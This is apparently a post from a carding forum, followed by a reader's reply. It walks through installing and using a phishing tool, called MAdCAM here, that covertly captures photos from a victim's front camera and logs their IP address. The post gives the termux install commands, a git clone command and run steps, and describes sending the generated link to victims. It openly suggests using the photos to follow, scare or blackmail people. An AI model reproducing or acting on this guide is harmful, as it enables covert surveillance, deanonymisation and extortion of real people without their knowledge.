Hacking the front-facing camera using a link


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Good day to all brothers and sisters. As you already know, the world of carding is a very fun place. Every second someone loses, and someone gets. In principle, everything is as usual. We work from the shadows. Under the so-called dome and as you can understand by the invisible dome, not only carders. Here I would like to share with you a fun way to deanon anyone.

MAdCAM is an image capture tool that will allow you to capture images from the victim's phone and save them inside your termux. Using this tool, you can take a picture of anyone's face just by sending them a phishing link. This tool can help in situations where you want to know someone's identity.

How does the MAdCAM tool work?
1. Create a link using the Madcam tool.
2. Send the link generated by the tool to the victim.
3. When the victim clicks on the link, you will receive pictures from their camera on your phone.
4. After that, you can directly see the image or move it to your internal memory.

How do I install the MAdCAM tool in Termux?
apt update & & apt upgrade -y
apt install php wget git -y

This will install Php wget and git in termux, which will be used when using the MAdCAM tool. If you already have some of this, you can remove this name from the command during installation.

Now all the dependencies are installed in your termux, and we can now install the Madcam tool in termux using the command below. The file size of this tool is so small that just copy and paste the command below and the tool will be installed in 10 seconds.

git clone https://github.com/kinghacker0/WishFish.git
cd MadCam
bash installmad.sh

How to use MAdCAM in Termux?
bash installmad.sh

If you are using this tool for the first time, it will install NGrok in Termux. This process may take 1 minute if you have a slow internet connection. (also, if you don't get the link, please restart your termux and it will resolve the issue.)

Now you will receive a link that you will send to the victim and wait for the victim to click on this link, you will see the victim's IP address, after which you will receive several image files in your termux application. Which will be captured from the victim's front camera. You will get more than 1 image if the victim stays on the page for a long time.

Now that you're done capturing images just press the ctrl + C button and type the ls command, and you'll see the image files.

Now, to see the images, you just need to type the following command and you will be able to see the images in the same termux application.

For example: termux-open madcam_05Mar234132412.png

I would like to summarize this by saying that you, dear friends, should not forget that great power (in our case, this is information) requires great responsibility(in our case, fuck)

How to use the received information, think for yourself. It can follow someone, scare them, or make fun of them. What if it's blackmail?))

In which case. Newbie training continues. I still don't ask you for a penny. If only we could work and develop our business. My personal account is always open for you. We are writing. We ask. We raise the money.


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bro i found many article from u in the forum.but seems no one appreciated it. I think others are busy with the carding stuff. thanks for your post i found all interesting,i really do like stuff like this but im abit late start learning all this IT things.